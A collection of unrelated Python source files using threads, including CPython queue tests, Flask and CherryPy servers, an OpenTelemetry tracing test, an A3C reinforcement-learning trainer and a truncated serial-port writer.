def test_queue_task_done(self):
# Test to make sure a queue task completed successfully.
q = self.type2test()
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_queue_join(self):
# Test that a queue join()s successfully, and before anything else
# (done twice for insurance).
q = self.type2test()
self.queue_join_test(q)
self.queue_join_test(q)
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_simple_queue(self):
# Do it a couple of times on the same queue.
# Done twice to make sure works with same instance reused.
q = self.type2test(QUEUE_SIZE)
self.simple_queue_test(q)
self.simple_queue_test(q)
def test_negative_timeout_raises_exception(self):
q = self.type2test(QUEUE_SIZE)
with self.assertRaises(ValueError):
q.put(1, timeout=-1)
with self.assertRaises(ValueError):
q.get(1, timeout=-1)
def test_nowait(self):
q = self.type2test(QUEUE_SIZE)
for i in range(QUEUE_SIZE):
q.put_nowait(1)
with self.assertRaises(queue.Full):
q.put_nowait(1)
for i in range(QUEUE_SIZE):
q.get_nowait()
with self.assertRaises(queue.Empty):
q.get_nowait()
def test_shrinking_queue(self):
# issue 10110
q = self.type2test(3)
q.put(1)
q.put(2)
q.put(3)
with self.assertRaises(queue.Full):
q.put_nowait(4)
self.assertEqual(q.qsize(), 3)
q.maxsize = 2 # shrink the queue
with self.assertRaises(queue.Full):
q.put_nowait(4)
class QueueTest(BaseQueueTestMixin, unittest.TestCase):
type2test = queue.Queue
class LifoQueueTest(BaseQueueTestMixin, unittest.TestCase):
type2test = queue.LifoQueue
class PriorityQueueTest(BaseQueueTestMixin, unittest.TestCase):
type2test = queue.PriorityQueue
# A Queue subclass that can provoke failure at a moment's notice :)
class FailingQueueException(Exception):
pass
class FailingQueue(queue.Queue):
def __init__(self, *args):
self.fail_next_put = False
self.fail_next_get = False
queue.Queue.__init__(self, *args)
def _put(self, item):
if self.fail_next_put:
self.fail_next_put = False
raise FailingQueueException("You Lose")
return queue.Queue._put(self, item)
def _get(self):
if self.fail_next_get:
self.fail_next_get = False
raise FailingQueueException("You Lose")
return queue.Queue._get(self)
class FailingQueueTest(BlockingTestMixin, unittest.TestCase):
def failing_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
for i in range(QUEUE_SIZE-1):
q.put(i)
# Test a failing non-blocking put.
q.fail_next_put = True
try:
q.put("oops", block=0)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.fail_next_put = True
try:
q.put("oops", timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a failing blocking put
q.fail_next_put = True
try:
self.do_blocking_test(q.put, ("full",), q.get, ())
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
# Test a failing timeout put
q.fail_next_put = True
try:
self.do_exceptional_blocking_test(q.put, ("full", True, 10), q.get, (),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
q.get()
self.assertTrue(not qfull(q), "Queue should not be full")
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a blocking put
self.do_blocking_test(q.put, ("full",), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.put("first")
q.fail_next_get = True
try:
q.get()
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.fail_next_get = True
try:
q.get(timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.fail_next_get = True
try:
self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# put succeeded, but get failed.
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
def test_failing_queue(self):
# Test to make sure a queue is functioning correctly.
# Done twice to the same instance.
q = FailingQueue(QUEUE_SIZE)
self.failing_queue_test(q)
self.failing_queue_test(q)
def test_main():
support.run_unittest(QueueTest, LifoQueueTest, PriorityQueueTest,
FailingQueueTest)
if __name__ == "__main__":
test_main()
|
nr_example.py
|
#Copyright (c) 2017 Joseph D. Steinmeyer (jodalyst)
#Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so, subject
# to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies
# or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
#questions? email me at jodalyst@mit.edu
import time
import math
from threading import Thread, Lock
from flask import Flask, render_template, session, request
from flask_socketio import SocketIO, emit, join_room, leave_room,close_room, rooms, disconnect
# Set this variable to "threading", "eventlet" or "gevent" to test the
# different async modes, or leave it set to None for the application to choose
# the best option based on available packages.
#async_mode = 'threading'
#async_mode = 'eventlet'
async_mode = None
if async_mode is None:
try:
import eventlet
async_mode = 'eventlet'
except ImportError:
pass
if async_mode is None:
try:
from gevent import monkey
async_mode = 'gevent'
except ImportError:
pass
if async_mode is None:
async_mode = 'threading'
print('async_mode is ' + async_mode)
# monkey patching is necessary because this application uses a background
# thread
if async_mode == 'eventlet':
import eventlet
eventlet.monkey_patch()
elif async_mode == 'gevent':
from gevent import monkey
monkey.patch_all()
#Start up Flask server:
app = Flask(__name__, template_folder = './',static_url_path='/static')
app.config['SECRET_KEY'] = 'secret!' #shhh don't tell anyone. Is a secret
socketio = SocketIO(app, async_mode = async_mode)
thread = None
def dataThread():
unique3 = 125
unique4 = 126
amp1 = 50
amp2 = 12
omega1 = 10
omega2 = 30
count = 0
print("start running")
while True:
val1 = amp1*math.sin(omega1*time.time())
val2 = amp2*math.sin(omega2*time.time())
socketio.emit('update_{}'.format(unique3),val1,broadcast =True)
if count%5 == 0:
socketio.emit('update_{}'.format(unique4),val2,broadcast =True)
count+=1
print('sending')
time.sleep(0.02)
@app.route('/')
def index():
global thread
print ("A user connected")
if thread is None:
thread = Thread(target=dataThread)
thread.daemon = True
thread.start()
return render_template('numerical_reporter_example.html')
if __name__ == '__main__':
socketio.run(app, port=3000, debug=True)
|
emails.py
|
from flask_mail import Message
from . import mail
from flask import current_app, render_template
from threading import Thread
def send_asynx_mail(app, msg):
with app.app_context():
mail.send(msg)
def send_mail(to,subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['MAIL_SUBJECT_PREFIX'] + subject, sender=app.config['MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_asynx_mail, args=[app, msg])
thr.start()
return thr
|
server.py
|
import cherrypy
from cherrypy.lib.static import serve_file
import os
import sys
import webbrowser
import threading
import time
import socket
import json
from client import addClient, loadClients, clearClients, clientsList, removeClient
from transmitJSON import sendJSON, recvJSON
def getRootDir():
return os.path.dirname(os.path.abspath(sys.argv[0]))
def manageClient(client, addr):
data = recvJSON(client)
data['ip']=addr[0]
try:
addClient(data)
sendJSON(client, {'ok': True})
except ValueError as e:
sendJSON(client, {'ok': False, 'error': str(e)})
finally:
client.close()
def subscribeHandler():
s = socket.socket()
s.settimeout(0.5)
s.bind(('0.0.0.0', 3001))
s.listen()
print('listen for subscription on port', 3001)
while running:
try:
client, addr = s.accept()
manageClient(client, addr)
except socket.timeout:
pass
print('no more listen for subscription')
def startBrowser():
time.sleep(2)
webbrowser.open('http://localhost:3000')
print('browser started !')
class Server:
@cherrypy.expose(['game.js'])
def game(self):
cherrypy.response.headers['Content-Type'] = 'application/javascript'
return gameJS
@cherrypy.expose
@cherrypy.tools.json_out()
def clients(self):
return clientsList()
@cherrypy.expose
@cherrypy.tools.json_out()
@cherrypy.tools.json_in()
def remove(self):
data = cherrypy.request.json
removeClient(data['name'])
if __name__ == '__main__':
if len(sys.argv) > 1:
game = sys.argv[1]
else:
game = 'matches'
with open(os.path.join(getRootDir(),f'public/games/{game}.js')) as file:
gameJS = file.read().encode('utf8')
running = True
threading.Thread(target=startBrowser).start()
thread = threading.Thread(target=subscribeHandler)
thread.start()
def stop():
print('STOPPING subscription handler...')
global running
running = False
thread.join()
print('subscription handler stopped')
loadClients()
cherrypy.engine.subscribe('stop', stop)
cherrypy.quickstart(Server(), '', 'server.conf')
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return 'Wrong place. Go to discord to interact with bot.'
def run():
app.run(host='0.0.0.0',port=3333)
def keep_alive():
t = Thread(target=run)
t.start()
|
test_request_safety.py
|
# Copyright 2019, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import asyncio
import aiohttp_jinja2
from urllib import request
from aiohttp.test_utils import unittest_run_loop
from oteltrace.pin import Pin
from oteltrace.provider import DefaultContextProvider
from oteltrace.contrib.aiohttp.patch import patch, unpatch
from oteltrace.contrib.aiohttp.middlewares import trace_app
from .utils import TraceTestCase
class TestAiohttpSafety(TraceTestCase):
"""
Ensure that if the ``AsyncioTracer`` is not properly configured,
bad traces are produced but the ``Context`` object will not
leak memory.
"""
def enable_tracing(self):
# aiohttp TestCase with the wrong context provider
trace_app(self.app, self.tracer)
patch()
Pin.override(aiohttp_jinja2, tracer=self.tracer)
self.tracer.configure(context_provider=DefaultContextProvider())
def disable_tracing(self):
unpatch()
@unittest_run_loop
@asyncio.coroutine
def test_full_request(self):
# it should create a root span when there is a handler hit
# with the proper tags
request = yield from self.client.request('GET', '/template/')
assert 200 == request.status
yield from request.text()
# the trace is created
traces = self.tracer.writer.pop_traces()
assert 1 == len(traces)
assert 2 == len(traces[0])
request_span = traces[0][0]
template_span = traces[0][1]
# request
assert 'aiohttp-web' == request_span.service
assert 'aiohttp.request' == request_span.name
assert 'GET /template/' == request_span.resource
# template
assert 'aiohttp-web' == template_span.service
assert 'aiohttp.template' == template_span.name
assert 'aiohttp.template' == template_span.resource
@unittest_run_loop
@asyncio.coroutine
def test_multiple_full_request(self):
NUMBER_REQUESTS = 10
responses = []
# it should produce a wrong trace, but the Context must
# be finished
def make_requests():
url = self.client.make_url('/delayed/')
response = request.urlopen(str(url)).read().decode('utf-8')
responses.append(response)
# blocking call executed in different threads
ctx = self.tracer.get_call_context()
threads = [threading.Thread(target=make_requests) for _ in range(NUMBER_REQUESTS)]
for t in threads:
t.start()
# yield back to the event loop until all requests are processed
while len(responses) < NUMBER_REQUESTS:
yield from asyncio.sleep(0.001)
for response in responses:
assert 'Done' == response
for t in threads:
t.join()
# the trace is wrong but the Context is finished
spans = self.tracer.writer.pop()
assert NUMBER_REQUESTS == len(spans)
assert 0 == len(ctx._trace)
|
A3C_Allocation.py
|
from tensorflow.python.tools.inspect_checkpoint import print_tensors_in_checkpoint_file
import threading
import multiprocessing
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import tensorflow.contrib.slim as slim
import scipy.signal
import pandas as pd
from model.helper import *
from model.trained_transporter import Transporter
from simulater.Environment import Environment
from random import choice
from time import sleep
from time import time
# Copies one set of variables to another.
# Used to set worker network parameters to those of global network.
def update_target_graph(from_scope,to_scope):
from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
op_holder = []
for from_var,to_var in zip(from_vars,to_vars):
op_holder.append(to_var.assign(from_var))
return op_holder
# Processes Doom screen image to produce cropped and resized image.
def process_frame(frame):
'''
s = frame[10:-10,30:-30]
s = scipy.misc.imresize(s,[84,84])
s = np.reshape(s,[np.prod(s.shape)]) / 255.0
'''
s = frame.flatten()
return s
# Discounting function used to calculate discounted returns.
def discount(x, gamma):
return scipy.signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1]
#Used to initialize weights for policy and value output layers
def normalized_columns_initializer(std=1.0):
def _initializer(shape, dtype=None, partition_info=None):
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
class AC_Network():
def __init__(self, s_size, a_size, scope, trainer):
with tf.variable_scope(scope):
# Input and visual encoding layers
self.inputs = tf.placeholder(shape=[None, s_size], dtype=tf.float32)
self.imageIn = tf.reshape(self.inputs, shape=[-1, height, width, 1])
self.conv1 = slim.conv2d(activation_fn=tf.nn.elu,
inputs=self.imageIn, num_outputs=16,
kernel_size=[2, 2], stride=[1, 1], padding='SAME')
self.conv2 = slim.conv2d(activation_fn=tf.nn.elu,
inputs=self.conv1, num_outputs=32,
kernel_size=[2, 2], stride=[1, 1], padding='SAME')
hidden = slim.fully_connected(slim.flatten(self.conv2), 256, activation_fn=tf.nn.elu)
# Recurrent network for temporal dependencies
lstm_cell = tf.contrib.rnn.BasicLSTMCell(256, state_is_tuple=True)
c_init = np.zeros((1, lstm_cell.state_size.c), np.float32)
h_init = np.zeros((1, lstm_cell.state_size.h), np.float32)
self.state_init = [c_init, h_init]
c_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.c])
h_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.h])
self.state_in = (c_in, h_in)
rnn_in = tf.expand_dims(hidden, [0])
step_size = tf.shape(self.imageIn)[:1]
state_in = tf.contrib.rnn.LSTMStateTuple(c_in, h_in)
lstm_outputs, lstm_state = tf.nn.dynamic_rnn(
lstm_cell, rnn_in, initial_state=state_in, sequence_length=step_size,
time_major=False)
lstm_c, lstm_h = lstm_state
self.state_out = (lstm_c[:1, :], lstm_h[:1, :])
rnn_out = tf.reshape(lstm_outputs, [-1, 256])
# Output layers for policy and value estimations
self.policy = slim.fully_connected(rnn_out, a_size,
activation_fn=tf.nn.softmax,
weights_initializer=normalized_columns_initializer(0.01),
biases_initializer=None)
self.value = slim.fully_connected(rnn_out, 1,
activation_fn=None,
weights_initializer=normalized_columns_initializer(1.0),
biases_initializer=None)
# Only the worker network need ops for loss functions and gradient updating.
if scope != 'global_Alloc':
self.actions = tf.placeholder(shape=[None], dtype=tf.int32)
self.actions_onehot = tf.one_hot(self.actions, a_size, dtype=tf.float32)
self.target_v = tf.placeholder(shape=[None], dtype=tf.float32)
self.advantages = tf.placeholder(shape=[None], dtype=tf.float32)
self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1])
# Loss functions
self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1])))
self.entropy = - tf.reduce_sum(self.policy * tf.log(self.policy))
self.policy_loss = -tf.reduce_sum(tf.log(self.responsible_outputs) * self.advantages)
self.loss = 0.5 * self.value_loss + self.policy_loss - self.entropy * 0.01
# Get gradients from local network using local losses
local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)
self.gradients = tf.gradients(self.loss, local_vars)
self.var_norms = tf.global_norm(local_vars)
grads, self.grad_norms = tf.clip_by_global_norm(self.gradients, 40.0)
# Apply local gradients to global network
global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'global_Alloc')
self.apply_grads = trainer.apply_gradients(zip(grads, global_vars))
class Worker():
def __init__(self, game, name, s_size, a_size, trainer, model_path, global_episodes):
self.name = "global_Alloc/worker_" + str(name)
self.number = name
self.model_path = model_path
self.trainer = trainer
self.global_episodes = global_episodes
self.increment = self.global_episodes.assign_add(1)
self.episode_rewards = []
self.episode_lengths = []
self.episode_mean_values = []
self.summary_writer = tf.summary.FileWriter("../Workers/Alloc/%d-%d-%s/train_" % (width, height, file_name) + str(self.number))
# Create the local copy of the network and the tensorflow op to copy global paramters to local network
self.local_AC = AC_Network(s_size, a_size, self.name, trainer)
self.update_local_ops = update_target_graph('global_Alloc', self.name)
self.actions = self.actions = np.identity(a_size, dtype=bool).tolist()
# End Doom set-up
self.env = game
def train(self, rollout, sess, gamma, bootstrap_value):
rollout = np.array(rollout)
observations = rollout[:, 0]
actions = rollout[:, 1]
rewards = rollout[:, 2]
next_observations = rollout[:, 3]
values = rollout[:, 5]
# Here we take the rewards and values from the rollout, and use them to
# generate the advantage and discounted returns.
# The advantage function uses "Generalized Advantage Estimation"
self.rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])
discounted_rewards = discount(self.rewards_plus, gamma)[:-1]
self.value_plus = np.asarray(values.tolist() + [bootstrap_value])
advantages = rewards + gamma * self.value_plus[1:] - self.value_plus[:-1]
advantages = discount(advantages, gamma)
# Update the global network using gradients from loss
# Generate network statistics to periodically save
feed_dict = {self.local_AC.target_v: discounted_rewards,
self.local_AC.inputs: np.vstack(observations),
self.local_AC.actions: actions,
self.local_AC.advantages: advantages,
self.local_AC.state_in[0]: self.batch_rnn_state[0],
self.local_AC.state_in[1]: self.batch_rnn_state[1]}
v_l, p_l, e_l, g_n, v_n, self.batch_rnn_state, _ = sess.run([self.local_AC.value_loss,
self.local_AC.policy_loss,
self.local_AC.entropy,
self.local_AC.grad_norms,
self.local_AC.var_norms,
self.local_AC.state_out,
self.local_AC.apply_grads],
feed_dict=feed_dict)
return v_l / len(rollout), p_l / len(rollout), e_l / len(rollout), g_n, v_n
def work(self, max_episode_length, gamma, sess, coord, saver):
episode_count = sess.run(self.global_episodes)
total_steps = 0
print("Starting worker " + str(self.number))
with sess.as_default(), sess.graph.as_default():
total_r = 0.0
epis = 0
while not coord.should_stop():
sess.run(self.update_local_ops)
episode_buffer = []
episode_values = []
episode_frames = []
episode_reward = 0
episode_step_count = 0
d = False
#self.env.new_episode()
s = self.env.get_state()
#s = self.env.get_state().screen_buffer
episode_frames.append(s)
s = process_frame(s)
rnn_state = self.local_AC.state_init
self.batch_rnn_state = rnn_state
#while self.env.is_episode_finished() == False:
#prearranged = random.sample(range(25), 20)
array_states = None
array_policies = None
while d == False:
# Take an action using probabilities from policy network output.
a_dist, v, rnn_state = sess.run(
[self.local_AC.policy, self.local_AC.value, self.local_AC.state_out],
feed_dict={self.local_AC.inputs: [s],
self.local_AC.state_in[0]: rnn_state[0],
self.local_AC.state_in[1]: rnn_state[1]})
a = np.random.choice(a_dist[0], p=a_dist[0])
'''
if episode_step_count == 0:
array_states = s.reshape(5, 5)
array_policies = a_dist[0].reshape(5, 5)
else:
array_states = np.concatenate((array_states, s.reshape(5, 5)), axis=0)
array_policies = np.concatenate((array_policies, a_dist[0].reshape(5, 5)), axis=0)
print('s')
print(s.reshape(5,5))
print('p')
print(a_dist[0].reshape(5, 5))
df_csv.to_csv('E130_소지번.csv', sep=',', index=False, header=False)
'''
a = np.argmax(a_dist == a)
#if episode_step_count < -1:
# a = prearranged[episode_step_count]
s1, r, d, rs = self.env.step(a)
if d == False:
episode_frames.append(s1)
s1 = process_frame(s1)
else:
s1 = s
'''
array_states = np.concatenate((array_states, array_policies), axis=1)
df = pd.DataFrame(array_states)
df.to_csv(str(episode_count)+'.csv', sep=',', index=False, header=False)
'''
#transporter.make_long_gif()
epis += 1
#print(episode_step_count)
#print('total')
total_r += episode_reward
#print(episode_reward)
#print(total_r/epis)
episode_buffer.append([s, a, r, s1, d, v[0, 0]])
#재배치가 일어난 경우 buffer의 reward를 수정
if rs is not None:
for step, reward in rs.items():
episode_buffer[step][2] += reward
episode_reward += sum(rs.values())
#episode_reward += r
episode_values.append(v[0, 0])
s = s1
total_steps += 1
episode_step_count += 1
# If the episode hasn't ended, but the experience buffer is full, then we
# make an update step using that experience rollout.
if len(episode_buffer) == 100 and d != True and episode_step_count != max_episode_length - 1:
# Since we don't know what the true final return is, we "bootstrap" from our current
# value estimation.
v1 = sess.run(self.local_AC.value,
feed_dict={self.local_AC.inputs: [s],
self.local_AC.state_in[0]: rnn_state[0],
self.local_AC.state_in[1]: rnn_state[1]})[0, 0]
v_l, p_l, e_l, g_n, v_n = self.train(episode_buffer, sess, gamma, v1)
episode_buffer = []
sess.run(self.update_local_ops)
if d == True:
print('episode finished with {0} steps and {1} reward'.format(episode_step_count, episode_reward))
break
self.episode_rewards.append(episode_reward)
self.episode_lengths.append(episode_step_count)
self.episode_mean_values.append(np.mean(episode_values))
# Update the network using the episode buffer at the end of the episode.
if len(episode_buffer) != 0:
v_l, p_l, e_l, g_n, v_n = self.train(episode_buffer, sess, gamma, 0.0)
# Periodically save gifs of episodes, model parameters, and summary statistics.
if episode_count % 100 == 0 and episode_count != 0:
if self.name == 'global_Alloc/worker_0' and episode_count % 1000 == 0:
time_per_step = 0.05
images = np.array(episode_frames)
if images.shape[1] != 3:
images = color_frame_continuous(images)
big_images = []
for image in images:
big_images.append(scipy.misc.imresize(image, [width*30, height*30], interp='nearest'))
big_images = np.array(big_images)
make_gif(big_images, '../frames/Alloc/%d-%d-%s/image' % (width, height, file_name) + str(episode_count) + '.gif',
duration=len(big_images) * time_per_step, true_image=True, salience=False)
if episode_count % 2000 == 0 and self.name == 'global_Alloc/worker_0':
#saver.save(sess, self.model_path + '/model-' + str(episode_count) + '.cptk')
print("Saved Model")
mean_reward = np.mean(self.episode_rewards[-5:])
mean_length = np.mean(self.episode_lengths[-5:])
mean_value = np.mean(self.episode_mean_values[-5:])
summary = tf.Summary()
summary.value.add(tag='Perf/Reward', simple_value=float(mean_reward))
summary.value.add(tag='Perf/Length', simple_value=float(mean_length))
summary.value.add(tag='Perf/Value', simple_value=float(mean_value))
summary.value.add(tag='Losses/Value Loss', simple_value=float(v_l))
summary.value.add(tag='Losses/Policy Loss', simple_value=float(p_l))
summary.value.add(tag='Losses/Entropy', simple_value=float(e_l))
summary.value.add(tag='Losses/Grad Norm', simple_value=float(g_n))
summary.value.add(tag='Losses/Var Norm', simple_value=float(v_n))
#self.summary_writer.add_summary(summary, episode_count)
self.summary_writer.flush()
if self.name == 'global_Alloc/worker_0':
sess.run(self.increment)
episode_count += 1
max_episode_length = 300
gamma = .99 # discount rate for advantage estimation and reward discounting
width = 7
height = 5
num_blocks = 30
mode = 0
s_size = width * height # Observations are greyscale frames of 84 * 84 * 1
a_size = s_size # Agent can move Left, Right, or Fire
load_model = True
#input_path = '../data/test_data3.csv'
input_path = None
#file_name = input_path.split('/')[-1][:-4]
file_name = str(num_blocks)
model_path = '../SavedModels/A3C/Alloc/%d-%d-%s' % (width, height, file_name)
tf.reset_default_graph()
if not os.path.exists(model_path):
os.makedirs(model_path)
# Create a directory to save episode playback gifs to
if not os.path.exists('../frames/Alloc'):
os.makedirs('../frames/Alloc')
if not os.path.exists('../frames/Alloc/%d-%d-%s' % (width, height, file_name)):
os.makedirs('../frames/Alloc/%d-%d-%s' % (width, height, file_name))
with tf.device("/cpu:0"):
global_episodes = tf.Variable(0, dtype=tf.int32, name='global_episodes', trainable=False)
trainer = tf.train.AdamOptimizer(learning_rate=1e-4)
master_network = AC_Network(s_size, a_size, 'global_Alloc', None) # Generate global network
num_workers = multiprocessing.cpu_count() # Set workers to number of available CPU threads
workers = []
# Create worker classes
for i in range(int(1)):
workers.append(Worker(Environment(input_path, width, height, i, num_blocks), i, s_size, a_size, trainer, model_path, global_episodes))
variables = slim.get_variables_to_restore()
variables_to_restore = [v for v in variables if v.name.split('/')[0] == 'global_Alloc']
variables_to_restore.append(global_episodes)
saver = tf.train.Saver(variables_to_restore)
with tf.Session() as sess:
coord = tf.train.Coordinator()
if load_model == True:
print('Loading Model...')
#print_tensors_in_checkpoint_file(file_name=model_path+'/model-21750.cptk', tensor_name='', all_tensors=True)
ckpt = tf.train.get_checkpoint_state(model_path)
saver.restore(sess, ckpt.model_checkpoint_path)
else:
sess.run(tf.global_variables_initializer())
transporter = Transporter(sess, width, height, mode=mode)
# This is where the asynchronous magic happens.
# Start the "work" process for each worker in a separate threat.
worker_threads = []
for worker in workers:
worker.env.set_transporter(transporter)
worker_work = lambda: worker.work(max_episode_length, gamma, sess, coord, saver)
t = threading.Thread(target=(worker_work))
t.start()
sleep(0.5)
worker_threads.append(t)
coord.join(worker_threads)
|
serialwriter.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ts=2 sw=2 et ai
###############################################################################
# Copyright (c) 2012,2013 Andreas Vogel andreas@wellenvogel.net
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# parts from this software (AIS decoding) are taken from the gpsd project
# so refer to this BSD licencse also (see ais.py) or omit ais.py
###############################################################################
from avnserial import *
import avnav_handlerList
from avnav_worker import AVNWorker
hasSerial=False
try:
import serial
hasSerial=True
except:
pass
#a writer class to write to a serial port using pyserial
#on windows use an int for the port - e.g. use 4 for COM5
#on linux use the device name for the port
#this class is not directly a worker that can be instantiated from the config
#instead it is used by worker classes to handle serial output
#basically the configuration is the same like for the reader
#except that autobaud settings are ignored
class SerialWriter(SerialReader):
@classmethod
def getConfigParam(cls):
rt=SerialReader.getConfigParam().copy();
rt.update({
'feederName':'', #if set, use this feeder (if combined use it both for reader and writer)
'combined' : False, #if true, also start a reader
'readFilter':'', #filterstring for reading
'blackList':'' #, separated list of sources that we will not send out
})
return rt
#parameters:
#param - the config dict
#navdata - a nav data object (can be none if this reader does not directly write)
#a write data method used to write a received line
def __init__(self,param,writeData,infoHandler,sourceName):
for p in ('port','name','timeout'):
if param.get(p) is None:
raise Exception("missing "+p+" parameter for serial writer")
self.param=param
self.infoHandler=infoHandler
self.doStop=False
self.writeData=writeData
if self.writeData is None:
raise Exception("writeData has to be set")
feeder=AVNWorker.findFeeder(self.param.get('feederName'))
if feeder is None:
raise Exception("%s: cannot find a suitable feeder (name %s)",self.getName(),self.param.get('feederName') or "")
self.feeder=feeder
self.addrmap={}
#the serial device
self.device=None
self.buffer=None
self.sourceName=sourceName
self.blackList=[]
if param.get('blacklist') is not None:
self.blackList =param.get('blacklist').split(',')
self.blackList.append(sourceName)
def stopHandler(self):
self.doStop=True
def openDevice(self,baud,init=False):
self.buffer=''
f=None
try:
pnum=int(self.param['port'])
except:
pnum=self.param['port']
bytesize=int(self.param['bytesize'])
parity=self.param['parity']
stopbits=int(self.param['stopbits'])
xonxoff=int(self.param['xonxoff'])
rtscts=int(self.param['rtscts'])
portname=self.param['port']
timeout=float(self.param['timeout'])
name=self.getName()
if init:
AVNLog.info("openDevice for port %s, baudrate=%d, timeout=%f",
portname,baud,timeout)
init=False
else:
AVNLog.debug("openDevice for port %s, baudrate=%d, timeout=%f",portname,baud,timeout)
lastTime=time.time()
try:
self.setInfoWithKey("writer","opening %s at %d baud"%(portname,baud),AVNWorker.Status.STARTED)
f=serial.Serial(pnum, timeout=timeout, baudrate=baud, bytesize=bytesize, parity=parity, stopbits=stopbits, xonxoff=xonxoff, rtscts=rtscts)
self.setInfoWithKey("writer","port open",AVNWorker.Status.STARTED)
return f
except Exception:
self.setInfoWithKey("writer","unable to open port",AVNWorker.Status.ERROR)
try:
tf=traceback.format_exc(3).decode('ascii','ignore')
except:
tf="unable to decode exception"
AVNLog.debug("Exception on opening %s : %s",portname,tf)
if f is not None:
try:
f.close()
except:
pass
f=None
return f
def writeLine(self,serialDevice,data):
return serialDevice.write(data.encode('ascii','ignore'))
#the run method - just try forever
def run(self):
threading.current_thread().setName("[%s]%s - %s"%(AVNLog.getThreadId(),self.getName(),self.param['port']))
self.device=None
init=True
isOpen=False
AVNLog.debug("started with param %s",",".join(unicode(i)+"="+unicode(self.param[i]) for i in self.param.keys()))
self.setInfoWithKey("writer","created",AVNWorker.Status.STARTED)
startReader=self.param.get('combined')
if startReader is not None and unicode(startReader).upper()=='TRUE':
AVNLog.debug("starting reader")
reader=threading.Thread(target=self.readMethod)
reader.setDaemon(True)
reader.start()
while True and not self.doStop:
name=self.getName()
timeout=float(self.param['timeout'])
portname=self.param['port']
